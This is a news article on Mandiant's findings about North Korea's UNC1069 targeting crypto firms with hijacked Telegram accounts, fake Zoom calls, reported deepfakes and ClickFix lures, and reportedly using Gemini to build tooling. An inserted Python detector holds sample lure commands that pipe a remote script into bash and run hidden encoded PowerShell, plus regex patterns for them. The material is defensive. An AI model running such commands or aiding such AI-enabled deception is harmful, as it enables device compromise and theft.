Armed with new tools, North Koreans ramp up attacks on lucrative crypto sector


The cryptocurrency sector involves a lot of money and isn’t exactly secure. Unsurprisingly, North Korean hacking groups are eager to take advantage and steal as much as they can. Google’s Mandiant says it has discovered another intrusion targeting a fintech entity within the industry, attributed to UNC1069, a North Korean threat actor.

According to Mandiant, these groups continue to evolve their tradecraft to target the crypto and decentralized finance (DeFi) verticals. They arm themselves with new tooling and use AI-enabled social engineering, the researchers say.

This particular investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data.


“A highly determined effort”

“The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim,” Mandiant said in a blog post.

It looks like UNC1069, a financially motivated threat actor active since at least 2018, is further transitioning into a mature and dangerous attacker.


As early as November 2025, the Google Threat Intelligence Group said the attacker was not merely using AI for simple productivity gains but was deploying novel AI-enabled lures in active operations.

Now, “the volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft.”

Moreover, while UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, it now also deploys multiple new malware families alongside the known downloader SUGARLOADER, which suggests a significant expansion of the attacker’s arsenal.

Hijack, engage, and attack


Mandiant offers a telling story. A victim of one attack was contacted via Telegram through the account of an executive of a cryptocurrency company that had been compromised by UNC1069.


The true owner of the compromised account had warned their contacts from another social media profile that their Telegram account had been hijacked, but the attack still occurred.

UNC1069 engaged the victim and, after building a rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor’s infrastructure.

The victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company that appeared to be a deepfake.

“While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar characteristics, where deepfakes were also allegedly used,” the researchers said.

Once in the “meeting,” the fake video call facilitated a ruse that gave the end user the impression they were experiencing audio issues.

This was employed by the threat actor to conduct a ClickFix attack – a technique in which the threat actor directs the user to run troubleshooting commands on their system to address a purported technical issue.

The recovered web page provided two sets of commands to be run for “troubleshooting,” one for macOS and one for Windows. Embedded within the string of commands was a single command that initiated the infection chain.
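The ClickFix step described above, where a block of benign-looking “troubleshooting” commands hides the single command that starts the infection chain, is the point at which a defender can apply a cheap check before anyone pastes such a block into a terminal or Run dialog. The following Python is an added illustration and not code from Mandiant or from the incident; the command strings are constructed samples, and the heuristics (a download piped into an interpreter, an encoded payload, a hidden window, a padded command chain) are general indicators of this pattern rather than the specific commands Mandiant recovered.

```python
import re
from typing import Dict, List

# Constructed sample "troubleshooting" command blocks. These are NOT the
# commands from the incident (the article does not reproduce them); they
# only imitate the shape of a ClickFix lure: harmless-looking commands
# wrapped around one command that fetches and runs a payload.
SAMPLE_COMMANDS = {
    "macos_lure": (
        'echo "Resetting audio..."; system_profiler SPAudioDataType | head -n 5; '
        "curl -fsSL https://fix.example.invalid/audio.sh | bash; "
        'echo "Audio fixed, please rejoin the meeting"'
    ),
    "windows_lure": (
        "ipconfig /flushdns && powershell -w hidden -enc QUFBQQ== && echo Done"
    ),
    "benign": "system_profiler SPAudioDataType",
}

# Shell chaining operators: ';', '&&', '||' and a single pipe.
CHAIN_SPLIT = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")

# Each rule is (name, regex). A match is one reason to treat the block as
# a likely infection command rather than genuine troubleshooting.
RULES = [
    # A downloader whose output is piped straight into an interpreter.
    ("download_to_interpreter",
     re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|irm)\b[^|]*\|\s*"
                r"(bash|sh|zsh|python3?|iex|powershell)\b", re.I)),
    # Base64-encoded payloads hide what is actually executed.
    ("encoded_payload",
     re.compile(r"(-enc\b|-encodedcommand\b|FromBase64String|"
                r"base64\s+(-d|--decode)\b)", re.I)),
    # A hidden window keeps the victim from seeing the second stage run.
    ("hidden_window", re.compile(r"-(w|windowstyle)\s+hidden\b", re.I)),
    # Spawning a scripting host from a one-liner is rare in real fixes.
    ("script_interpreter",
     re.compile(r"\b(powershell|pwsh|osascript|bash\s+-c|sh\s+-c)\b", re.I)),
]


def assess_fix_command(cmd: str) -> Dict[str, object]:
    """Score one pasted command block; returns segment count, matched
    reasons and a boolean verdict. Heuristic only: a match means
    'review before running', not proof of malice."""
    segments: List[str] = [s for s in CHAIN_SPLIT.split(cmd) if s]
    reasons: List[str] = [name for name, rx in RULES if rx.search(cmd)]
    # Several chained commands around a suspicious one is the padding
    # pattern the article describes: the payload command is embedded in
    # a string of plausible-looking steps.
    if len(segments) >= 3 and reasons:
        reasons.append("padded_chain")
    return {"segments": len(segments), "reasons": reasons,
            "suspicious": bool(reasons)}


def scan_samples() -> Dict[str, bool]:
    """Run the check over the constructed samples; name -> verdict."""
    return {name: bool(assess_fix_command(cmd)["suspicious"])
            for name, cmd in SAMPLE_COMMANDS.items()}


if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        result = assess_fix_command(cmd)
        print(f"{name}: suspicious={result['suspicious']} "
              f"segments={result['segments']} reasons={result['reasons']}")
```

The same logic fits in a clipboard watcher or an endpoint rule that inspects the command line of a terminal or `powershell.exe` launched from a browser or chat client; the point is to look at the whole chain, since the individual “fix” commands are chosen precisely because each looks harmless on its own.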


North Korea is stealing billions in crypto

According to Mandiant, UNC1069 is now regularly using these techniques to target corporate entities and individuals within the crypto industry. The threat actor seems to be using tools like Gemini to develop their own tooling, conduct research, and aid with reconnaissance.

[Image: Gemini AI attack. Image by Cybernews]

“Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance targeting towards the Web3 industry, such as centralized exchanges, software developers at financial institutions, high-technology companies, and individuals at venture capital funds,” said the researchers.

For this particular incident, Mandiant noted an unusually large amount of tooling dropped onto a single host targeting a single individual.

This evidence confirms that this incident was a targeted attack to harvest as much data as possible for dual purposes – enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging the victim’s identity and data.

North Koreans are indeed good at stealing crypto. In December, Chainalysis said that state-sponsored criminals from North Korea were responsible for $2 billion in losses of crypto assets in 2025.


TRM Labs additionally concludes that North Korea has “industrialized theft in the crypto market,” moving from opportunistic hacks to a smart supply chain: sourcing initial access from social engineering specialists, extracting funds via infrastructure attacks, and liquidating assets through a subcontracted network of Chinese shadow bankers.

Crypto is, of course, highly vulnerable to cyberattacks due to a combination of its decentralized, immutable nature, the rapid development of new technologies without sufficient security audits, and the high financial rewards for hackers.
